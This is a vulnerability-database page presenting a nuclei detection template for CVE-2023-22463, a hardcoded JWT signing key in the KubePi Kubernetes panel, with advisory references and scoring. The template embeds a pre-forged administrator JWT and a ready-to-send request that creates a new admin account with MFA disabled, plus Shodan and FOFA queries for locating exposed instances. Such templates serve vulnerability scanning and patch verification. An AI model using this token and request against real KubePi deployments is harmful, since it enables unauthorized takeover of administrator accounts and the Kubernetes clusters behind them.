Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

KubePi JwtSigKey - Admin Authentication Bypass

🗓️ 01 Jun 2026 05:38:37Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 38 Views

KubePi JwtSigKey - Admin Authentication Bypass. KubePi authentication vulnerability allows an attacker to take over the administrator account and gain control of the k8s cluster

Related
Refs
Code
ReporterTitlePublishedViews
Family
Huntr		JwtSigKey hardcoded causes the k8s cluster to take over
2 Jan 202312:45
huntr
Circl		CVE-2023-22463
4 Jan 202318:18
circl
CNNVD		KubePi 信任管理问题漏洞
4 Jan 202300:00
cnnvd
CVE		CVE-2023-22463
4 Jan 202315:04
cve
Cvelist		CVE-2023-22463 KubePi's Hardcoded Jwtsigkeys allows malicious actor to login with a forged JWT token
4 Jan 202315:04
cvelist
Github Security Blog		KubePi allows malicious actor to login with a forged JWT token via Hardcoded Jwtsigkeys
6 Jan 202317:37
github
GitLab Advisory Database		Use of Hard-coded Credentials
6 Jan 202300:00
gitlab
NVD		CVE-2023-22463
4 Jan 202316:15
nvd
OSV		CVE-2023-22463 KubePi's Hardcoded Jwtsigkeys allows malicious actor to login with a forged JWT token
4 Jan 202315:04
osv
OSV		GHSA-VJHF-8VQX-VQPQ KubePi allows malicious actor to login with a forged JWT token via Hardcoded Jwtsigkeys
6 Jan 202317:37
osv
Rows per page
id: CVE-2023-22463

info:
  name: KubePi JwtSigKey - Admin Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access and control of the Kubernetes cluster.
  remediation: The vulnerability has been fixed in 1.6.3. In the patch, JWT key is specified in app.yml. If the user leaves it blank, a random key will be used. There are no workarounds aside from upgrading.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20JwtSigKey%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2023-22463.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22463
    - https://github.com/KubeOperator/KubePi/blob/da784f5532ea2495b92708cacb32703bff3a45a3/internal/api/v1/session/session.go#L35
    - https://github.com/KubeOperator/KubePi/commit/3be58b8df5bc05d2343c30371dd5fcf6a9fbbf8b
    - https://github.com/KubeOperator/KubePi/releases/tag/v1.6.3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-22463
    cwe-id: CWE-798
    epss-score: 0.91521
    epss-percentile: 0.99685
    cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fit2cloud
    product: kubepi
    shodan-query:
      - html:"kubepi"
      - http.html:"kubepi"
    fofa-query:
      - "kubepi"
      - body="kubepi"
  tags: cve,cve2023,kubepi,k8s,auth-bypass,fit2cloud,vkev,vuln
variables:
  name: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  nickname: "{{rand_base(4)}}"
  token: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8"

http:
  - raw:
      - |
        POST /kubepi/api/v1/users HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}

        {
          "authenticate": {
               "password": "{{password}}"
          },
          "email": "{{email}}",
          "isAdmin": true,
          "mfa": {
                  "enable": false
           },
          "name": "{{name}}",
          "nickName": "{{nickname}}",
          "roles": [
          ]
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"password":'
          - '"isAdmin":'
          - '"createAt":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a0046304402205d565846941bf88cb4fa968f4eee21dc28ef966a1187bbf63a8f4b4317ecef8e02200c30b743a6400564b1d573516542bd04ad3a31cd22cf56d4acbdab088f7a6261:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
CVSS 39.8
EPSS0.91521
SSVC
kubepiadmin bypassauthenticationvulnerabilityjwtsigkeyk8s cluster
38